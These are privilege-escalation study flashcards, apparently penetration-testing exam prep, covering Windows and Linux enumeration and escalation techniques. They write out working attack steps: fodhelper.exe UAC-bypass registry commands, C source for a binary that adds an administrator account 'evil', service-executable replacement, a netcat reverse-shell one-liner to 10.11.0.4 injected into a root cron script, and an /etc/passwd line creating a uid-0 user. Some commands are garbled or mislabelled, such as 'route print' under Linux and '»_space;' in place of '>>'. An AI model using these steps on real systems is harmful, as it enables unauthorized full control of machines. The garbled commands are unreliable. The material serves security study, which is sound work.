Privilege Escalation Flashcards
What is the process for enumerating users on a Windows machine?
- whoami
- net user
- - gains additional information about the user you are logged in with - net users
- - discover other user accounts on the system
What is the process for enumerating users on a Linux machine?
- whoami
- id
- cat /etc/passwd
- - enumerates other users on the system
How do you enumerate the Operating System Version and Architecture on a Windows machine?
c:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
How do you enumerate the Operating System Version and Architecture on a Linux machine?
- cat /etc/issue
- cat /etc/*-release
- uname -a
How do you list running processes on a Windows machine?
tasklist /SVC
How do you list running processes on a Linux machine?
ps axu
How do you enumerate all TCP/IP network configurations on a Windows machine?
ipconfig /all
How do you enumerate all TCP/IP network configurations on a Linux machine?
route print
How do you list active network connections on a Windows machine?
netstat -ano
How do you list active network connections on a Linux machine?
- ifconfig
- ip a
- /sbin/route
- ss -anp
How do you enumerate firewall settings on a Windows system?
- netsh advfirewall show currentprofile
- - netsh advfirewall firewall show rull name=all
How do we enumerate Scheduled Tasks on a Windows system?
– schtasks /query /fo LIST /v
How do we enumerate Scheduled Tasks on a Linux system?
- ls -lah /etc/cron*
- - cat /etc/crontab
How do we enumerate Installed Applications on a Windows machine?
– wmic product get name, version, vendor
How do we enumerate Patch Levels and Patch Levels on a Windows machine?
– wmic qfe get Caption, Description, HotFixID, InstalledOn
How do we enumerate Installed Applications on a Windows machine?
dpkg -l
On a Windows machine, how would you search for any file or directory in the Program Files directory that allows the ‘Everyone’ group ‘write’ permissions?
– accesschk.exe -uws “Everyone” “C:\Program Files”
What PowerShell cmdlet retrieves all permissions for a given file or directory?
Get-Acl
What additional cmdlet needs to be used with Get-Acl to run recursively?
Get-ChildItem
How would we use Get-Acl and Get-ChildItem cmdlets to get every file and directory under the Program Files directory that allows the ‘Everyone’ group to modify?
Get-ChildItem “C:\Program Files” -Recurse | Get-ACL | ?{$_.AccessToString -match “Everyone\sAllow\s\sModify”}
In Linux, how do you find every directory writable by the current user on the target system?
find / -writable -type d 2>/dev/null
How do you enumerate Unmounted Disks on a Windows machine?
- mountvol
How do we enumerate Unmounted Disks on a Linux machine?
- cat /etc/fstab
- mount
- /bin/lsblk
What are Device Drivers?
-A ‘driver’ is a software component that lets the operating system and a device communicate with each other.
In Windows, how can you enumerate Device Drivers and Kernel Modules?
- C:>powershell
- - PS C:> driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object ‘Display Name’, ‘Start Mode’, Path
In Windows, how can we get a list of Loaded Drivers?
- We can use the Get-WmiObject cmdlet to get the Win32_PnPSignedDriver WMI instance, which provides digital signature information about the drivers
- Get-WmiObject Win32 PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like “VMware”}
How can we enumerate the Loaded Kernel Modules?
– lsmod
How can we find out more information about a specific Kernel Module in Linux? (Ex. ‘libata’ Kernel Module)
– /sbin/modinfo libata
On Windows systems, which registry setting should be checked on which registries for a “privesc shortcut”?
Why and How?
- On Windows systems, we should check the status of the ‘AlwaysInstallElevated’ registry setting
- If this key is set to ‘1’ (enabled) in either HKEY_CURRENT_USER or HKEY_LOCAL_MACHINE, any user can run Windows Installer packages with Elevated Privileges.
- We can use ‘reg query’ to check these settings:
- C:> reg query HKEY_CURRENT_USER\Software\Policies \Microsoft\Windows\Installer
- C:> reg query HKEY_LOCAL_MACHINE\Software\Policies \Microsoft\Windows\Installer
In Linux, what should we search for to see if we can get files to run as the ‘root’ user? How is this located?
- SUID files
- if the SUID permission is set on a binary it will run with the permissions of the file owner
- if a binary has the SUID bit set and the file is owned by ‘root’, any local user will be able to execute that binary with elevated privileges
- find / -perm -u=s -type f 2>/dev/null
What is an automated tool to check for Windows privesc vulnerabilities? what command will provide all privesc vulns and groups?
- windows-privesc-check
- - C:> windows-privesc-check2.exe –dump -G
What is an automated tool to check for Linux privesc vulnerabilities?
- unix-privesc-check
How are privileges managed on Windows?
- Once a user is authenticated, Windows generates an access token that is assigned to that user
- The token itself contains various pieces of information that effectively describe the security context of a given user, including privileges
- Access tokens what are assigned a ‘security identifier’(SID)
In addition to privileges, what has Windows implemented to assign trust levels to application processes and securable objects? What are the levels?
- Integrity Levels
- This describes the level of trust the operating system has in running applications or securable objects
- The configured Integrity Level dictates what actions an application can perform, including the ability to read or write to the local file system
- There are four Integrity Levels:
- System Integrity Process: System rights
- High Integrity Process: Administrative rights
- Medium Integrity Process: Standard user rights
- Low Integrity Process: very restricted rights often used in sandboxed processes
What Windows command displays Integrity Levels in action?
– c:> whoami /groups
What security tokens does an Administrative user have, and what mechanism acts as a separation between those two Integrity Levels?
- The Administrative user has two security tokens:
- medium integrity level token
- high integrity level token
- UAC acts as the separation mechanism between those two integrity levels
Explain UAC
- User Account Control
- Forces applications and tasks to run in the context of a non-administrative account until an Administrator authorizes elevated access
- UAC will block installers and unauthorized applications from running without the permissions of an administrative account
- Two UAC modes:
- credential prompt
- consent prompt
When does a UAC Credential Prompt get triggered?
- When a standard user wishes to perform an administrative task, such as installing a new application
- The credentials of an Administrative User will be required to complete the install
When does a UAC Consent Prompt get triggered?
- When a administrative user wishes to perform an administrative task
- The administrative user simply has to confirm that the task should be completed
Why would an administrative user be blocked from changing their password in a cmd prompt?
- Because UAC is enabled and the CMD terminal is running with the administrative users medium integrity level token
UAC Bypass Exploit
- Windows 10 build 1709
- Leverages a UAC bypass based on fodhelper.exe
- This application is launched whenever a local user selects the “Manage optional features” option in the “Apps & Features” Windows Settings screen
- C:> \windows\System32\fodhelper.exe
- -
How can you get information about an application, such as required permissions to run and whether the application autoEvelavtes privileges?
- The Application Manifest is an XML file containing information that lets the operating system know how to handle the program when it is started.
- We can inspect the manifest with the ‘sigcheck’ utility from ‘Sysinternals’
- C:> cd C:\Tools\Privilege_escalation\ SysinternalsSuite
- C:\Sysin..> sigcheck.exe -a -m C:\Windows\System32\fodhelper.exe
When viewing the Application Manifest for an application, how do you know if the executable can auto-elevate to ‘high integrity’ w/o UAC prompt?
- the ‘autoElevate’ flag is set to ‘True’
How do you use Procmon to analyze an application such as ‘fodhelper.exe’?
- Run procmon.exe (sysinternals)
- Filter on process named ‘fodhelper.exe’
- Run ‘fodhelper.exe’
- Filter on ‘Result’ value of ‘NAME NOT FOUND’, which shows ‘fodhelper.exe’ attempting to access registry keys that do not exist.
- Focus on registry that we, as the current user, can control (HKEY_CURRENT_USER)(HKCU); Filter on ‘Path’ contains ‘HKCU’
- We see that ‘fodhelper.exe’ is trying to access HKCU:\Software\Classes\ms-setting\open\command registry key, which does not appear to exist.
Explain the ‘fodhelper.exe’ exploit
- Attempts to access ‘HKCU:\Software\Classes\ms-setting\open\command’ registry, but gets a ‘NAME NOT FOUND’ result (procmon)
- When it fails above, it next tries to access the same key in HKEY_CLASSES_ROOT
- Let’s add the registry to HKCU instead:
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command - Rerunning ‘fodhelper.exe’ in procmon, we see that attempts to query a value ‘DelegateExecute’ stored in HKCU
- Next, we add ‘DelegateExecute’ entry to our registry:
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ - Now, we see that ‘fodhelper.exe’ has a SUCCESS result (procmon) and finds the new ‘DelegateExecute’ entry, but finds an empty (Default) value
- Finally, let’s replace the empty (Default) value with cmd.exe
- - C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d “cmd.exe” /f - Running ‘fodhelper.exe’ now results in a CMD shell with admin access (high-integrity token) and we have bypassed UAC
How can you make a Registry entry execute a program, such as cmd.exe?
- Setting the ‘DelegateExecute’ key value to an empty value (REG_SZ) and then setting it to cmd.exe
- C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ
- C:> REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d “cmd.exe” /f
How are Insecure File Permissions exploited?
- Program runs as a Windows service
- During install, the program receives full read write access to all members of the Everyone group
- The program is replaced with a malicious file
- The service is restarted and the malicious file is executed with SYSTEM privileges
What is a directory to look in for possible Insecure File Permission exploits?
- Program Files
- These services are user-installed, and have a potential to be installed with elevated privileges
What PowerShell one-liner allows you to list the name of ‘running’ services and the Path where they are installed?
PS C:> Get-WmiObject win32-service | Select-Object Name, State, PathName | Where-Object {$_.State -like ‘Running’}
What is ‘icacls’?
- Windows utility that outputs the Security Identifiers (SIDs) followed by a permission mask
- C:> icacls “C:\Program Files\Serviio\bin\ServiioService.exe”
What are the ‘icacls’ permission masks?
- F = Full Access
- M = Modify Access
- RX = Read and execute access
- R = Read-only access
- W = Write-only access
After running ‘icacls’ on ServiioSerice.exe, you see it has the following permission, what can you do to exploit this?
- BUILTIN\Users:(I)(F)
- Any user (BUILTIN\Users) has Full-Access
- We can replace ServiioService.exe with our own malicious binary
- We can then reboot the service and execute our malicious binary
How would you create a malicious binary file named ‘adduser.exe’ that creates a user named ‘evil’ and adds this user to the ‘administrators’ group?
How would you replace the existing ServiioService.exe with ‘adduser.exe’?
How would you get ‘adduser.exe’ to execute?
- ## Create a ‘C’ file ‘adduser.c’ with the following code:#include
int main ()
{
int i;
i = system (“net user evil Ev!lpass /add”);
i = system (“net localgroup administrators evil /add”);
return 0;
}
———————————–
2. Cross-compile the code on our Kali machine with ‘i686-w64-mingw32-gcc’ with -o to specify the name of the compiled output:
– kali:~$ i686-w64-mingw32-gcc adduser.c -o adduser.exe
3. Transfer ‘adduser.exe’ to our target and replace ‘ServiioService.exe’
– C:> move “C:\Program Files\Serviio\bin\ServiioService.exe’ “C:\Program Files\Serviio\bin\ServiioService_original.exe”
– C:> move adduser.exe “C:\Program Files\Serviio\bin\ServiioService.exe”
4. Restart the Serviio service
– C:> net stop Serviio
– C:> net start Serviio
In Windows, how can we tell if a service (ex. Serviio) will restart on a reboot?
- If the ‘startmode’ value is ‘Auto’ is will automatically start on a reboot
- C:> wmic service where caption=”Serviio” get name, caption, state, startmode
In Windows, how can you tell if your user has permission to reboot the system?
- If the user has the privilege ‘SeShutdownPrivilege’
- - C:> whoami /priv
In Windows, how to you reboot the system?
C:> shutdown /r /t 0
When do you try to take advantage of Unquoted Service Paths?
- when we have write permissions to a service’s main directory and subdirectories, but cannot replace files within them
- Each Windows service maps to an executable file that will be run when the service is started.
- Most of the time, services that accompany third party software are stored under the C:\Program Files directory
Exploiting Unquoted Service Paths
- when using file or directory paths that contain spaces, the developers should always ensure that they are enclosed by quotation marks
- this ensures that they are explicitly declared
- However, when this is not the case and a path is unquoted, it is open to interpretation
- Specifically, in the case of executable paths, anything that comes after each whitespace character will be treated as a potential argument or option for the executable
How will Windows attempt to run the executable service.exe from the path C:\Program Files\My Program\My Service\service.exe?
- C:\Program.exe
- C:\Program Files\My.exe
- C:\Program Files\My Program\My.exe
- C:\Program Files\My Program\My Service\service.exe
How would you try to exploit the Unquoted Service Path vulnerability in the path C:\Program Files\My Program\My Service\service.exe? What would be the ideal outcome?
- Place a malicious executable named ‘My.exe’ in either the ‘C:\Program Files\My Program’ directory or ‘C:\Program Files\My Program\My Service’ directory.
- The ideal outcome would be when the service runs, it should execute the malicious ‘My.exe’ with the same privileges that the service starts with
- Often, these privileges are the NT\System account, which would result in a successful privilege escalation attack
What is something important to keep in mind when exploiting Windows Kernel vulnerabilities?
- When attempting to exploit system-level software (such as drivers or the kernel itself), we must pay careful attention to several factors:
- the target’s OS
- version
- architecture
- Failure to accurately identify these factors can trigger a BSOD
What attack surface should be investigated first when attempting to exploit Windows Kernel vulnerabilities?
- Third-party driver exploits are more common, and as such, we should always attempt to investigate this attack surface first
- Native kernel vulnerabilities are less common and more difficult to exploit
What command displays the Windows OS version and architecture?
– C:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type”
What command displays the Windows OS drivers?
- C:> driverquery /v
* ** This output primarily consists of typical Microsoft-installed drivers and third party drivers
If you are trying to get version information about a program, such as USBPcap, what command should you use?
– C:> type USBPcap.inf
How do we enumerate Windows Kernel vulnerabilities?
- Find the OS version and architecture
– C:> systeminfo | findstr /B /C:”OS Name” /C:”OS Version” /C:”System Type” - Enumerate the drivers that are installed on the system
– C:> driverquery /v - Query ‘searchsploit’ for any exploits for third party drivers discovered, looking specifically for exploits that match the driver version number
4.
What programming language are most exploits that target kernel-level vulnerabilities written in?
How does this impact exploit development?
- the vast majority of exploits targeting kernel-level vulnerabilities are written in a low-level programming language such as C or C++
- therefore, exploits must be compiled
- ideally, we want to compile code on the platform version we are attacking, and should spin up a VM that matches our target, and compile the code there
- However, we can also cross-compile the code on an operating system entirely different from the one we are targeting
If our target Windows machine has ‘mingw-w64.bat’ installed, how can we create an executable compiled to run on this machine? Assume the example exploit is ‘41542.c’
- Run the ‘mingw-w64.bat script that sets up the PATH env variable for the ‘gcc’ executable
- - C:> mingw-w64.bat - Run gcc to make sure it is working properly
- - C:> gcc -help - Transfer the exploit code to the Windows client and compile it
- - C:> gcc 41542.c -o exploit.exe
* ** May get warnings, but still works *** - Run malicious executable
What characteristics of a file on a Linux system do we look for to exploit Insecure File Permissions?
- an executable file
- allows us write access
- runs at an elevated privilege level
What is a prime target on Linux systems for exploiting Insecure File Permissions?
- the ‘cron’ time-based job scheduler
- system-level jobs are executed with root user privileges and system admins often create scripts for cron jobs with insecure permissions
Where should we look for installed cron jobs on a Linux system?
- ls -lah /etc/cron*
- cat /etc/crontab
- grep “CRON” /var/log/cron.log
Given a CRON job that executes a script ‘/var/scripts/user_backup.sh’ that runs with root privileges, how would we determine if local (low-level) users have write permissions to the script?
– ls -lah /var/scripts/user_backups.sh
What is the reverse shell one-liner to add to scripts in linux when exploiting Insecure File permissions?
- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f
- rm /tmp/f = removes any existing named pipes
- mkfifo /tmp/f = creates a named pipe
- cat /tmp/f|/bin/sh -i = creates an interactive shell on the local machine and hooks the output of the pipe to the shell’s input
- 2>&1|nc 10.11.0.4 1234 = takes the output of the shell and sends it over the network to a machine listening on port 1234 at 10.11.0.4
- > /tmp/f = takes the output of ‘nc’ and sends it to the named pipe’s input, where it becomes input for the shell
Given an existing script ‘user_backups.sh’, how would you write a reverse shell one-liner to it so it will connect to an attacking machine at 10.11.0.4 on 1234 when ‘user_backups.sh’ is run by the CRON job?
– echo “rm /tmp/f;mkfifo /tmp/f;cat /tmp/f| /bin/sh -i 2>&1|nc 10.11.0.4 1234 >/tmp/f”»_space; user_backups.sh
How can /etc/passwd be used to exploit Insecure File Permissions in Linux?
- Linux passwords are stored in /etc/shadow
- password hashes are stored in /etc/passwd
- If a password hash is present in the second column of a /etc/passwd user record, it is considered valid for authentication and takes precedence over the respective entry in /etc/shadow
- ## This means that if we can write into the /etc/passwd file, we can effectively set an arbitrary password for any account
On Linux, what algorithm is used to generate password hashes?
- crypt algorithm
Give an example of how to exploit Insecure File Permissions in Linux by creating a root user named ‘root2’ that is apart of the ‘root’ group
- Generate the password hash for ‘evil’
- - openssl passwd evil - Write the generated password hash to the /etc/passwd file for the user ‘root2’ and add to the ‘root’ user group
- - echo “root2:AD24fcSx2Il3I:0:0:root:/root:/bin/bash”»_space; /etc/passwd
What are the commands you should run to enumerate kernel vulnerabilities on a Linux machine?
- cat /etc/issue
- uname -r
- searchsploit linux kernel
- ** EX: searchsploit linux kernel Ubuntu 16.04 ***
Given the exploit ‘43418.c’ how would you compile it to run on Linux?
– gcc 43418.c -o exploit
